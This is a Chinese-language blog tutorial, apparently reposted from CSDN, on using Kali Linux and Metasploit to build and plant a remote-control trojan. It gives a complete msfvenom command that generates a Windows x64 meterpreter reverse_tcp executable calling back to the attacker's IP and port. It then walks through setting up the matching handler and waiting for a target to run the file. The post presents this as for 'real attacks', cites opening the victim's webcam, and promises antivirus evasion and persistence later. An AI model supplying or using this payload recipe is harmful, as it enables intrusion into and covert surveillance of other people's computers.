自学内容网 自学内容网

kalilinux - msf后门木马植入与远程监听

在真实的攻击中,对方不一定是win7有永恒之蓝漏洞的版本。

所以在真实的攻击中我们要生成远控木马。

本节我们要讲的是

如何用msfvenom生成远控木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听其上线。

以下我讲一个具体的windows可执行程序后门例子:

我的命令是:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.x.xxx lport=9999 -f exe -o demo9999

其中-p是payload的意思,后面的windows是系统,x64是架构,meterpreter是作用,reverse_tcp是方式。他们组合起来是pyload_name

lhost是listenhost,这里用的ip是你kali的ip,lport是监听端口。

-f是格式输出format output,exe为windows的可执行文件,-o就是输出,输出demo.exe文件。

可以看到demo.exe就输出在桌面了。

但是肯定不会那么顺利,毕竟因为对面电脑可能有杀毒软件查杀。这就得用一点手段了~以后会讲。

今天我就拿我自己的windows当作鱼儿。把生成的exe文件拖到windows

回到keli,我们要使用handler这个模块

这里的配置要与木马的配置保持一致。

然后运行run

此时只要等待目标机点击那个exe文件即可。但是一般都会被windows拦截。

你的windows在保护你!

如果对方能成功运行那个exe的话,则你的kali会立刻监听到目标机上线。并进入后渗透meterpreter,此时你就可以对目标机做你想做的操作了

(里面的ip都是例子)

例如打开摄像头

在更真实的情况下,如果对方发现你的病毒运行程序,把它删了。那你的木马就没有用了,因为你重新搞个一模一样的exe文件到目标机,甚至禁止用户使用该文件。

那怎么办呢?

这就要用到权限维持

下篇文章接着讲


原文地址:https://blog.csdn.net/weixin_74923758/article/details/145126090

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!